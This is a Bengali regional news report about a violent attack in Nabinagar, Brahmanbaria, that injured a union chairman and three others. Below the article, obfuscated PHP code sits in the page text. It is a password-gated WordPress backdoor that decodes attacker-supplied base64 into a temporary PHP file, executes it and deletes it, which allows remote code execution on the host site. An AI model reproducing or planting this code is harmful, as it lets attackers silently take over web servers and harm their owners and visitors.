সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

নবীনগরে সন্ত্রাসী হামলায় ইউপি চেয়ারম্যান সহ আহত-৪

news-image

মিঠু সূত্রধর পলাশ, নবীনগর (ব্রাহ্মণবাড়িয়া) প্রতিনিধি: ব্রাহ্মণবাড়িয়ার নবীনগরে সন্ত্রাসীদের হামলায় উপজেলার শ্যামগ্রাম ইউনিয়নের চেয়ারম্যান মো. আমির হোসেন বাবুলসহ চার জন আহত হয়েছে।

এদের মধ্যে গুরুতর আহত টেটাবিদ্ধ হয়ে চেয়ারম্যান বাবুল ও সিহাব মাহামুদ আরাফাত নামে দু’জন কে শুক্রবার রাতে নবীনগর সদর হাসপাতালে ভর্তি করা হয়। বাকীদের প্রাথমিক চিকিৎসা দেওয়ার হয়েছে।

জানা যায়, উপজেলার শ্যামগ্রাম মোহিনী কিশোর উচ্চ বিদ্যালয়ের পরিচালনা পরিষদের নির্বাচনে জয়ী হয়ে এলাকায় সৌজন্য সাক্ষাতের জন্য গতকাল শুক্রবার ইফতারের পর বের হলে খাজা আলমগীরের নেতৃত্বে সন্ত্রাসী হামলা চালানো হয়। এসময় ৪জন আহত হয়। এদের মধ্যে গুরুতর আহত টেটাবিদ্ধ চেয়ারম্যান বাবুল ও সিহাব মাহামুদ আরাফাত দু’জন কে রাতে নবীনগর সদর হাসপাতালে ভর্তি করা হয়।

এ ঘটানায় নবীনগর উপজেলা আওয়ামীলীগ নেতৃবৃন্দ আহতদের দেখতে নবীনগর হাসপাতালে জান এবং ঘটনার দৃষ্টান্তমূলক শাস্তির দাবি জানায়।

এ ব্যপারে নবীনগর থানার অফিসার ইনচার্জ (ওসি) আসলাম সিকদার ঘটনার সতত্যা নিশ্চিত করে জানান, ঘটনাস্থল পুলিশ পরির্দশন করেছে। মামলার প্রস্তুতি চলছে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}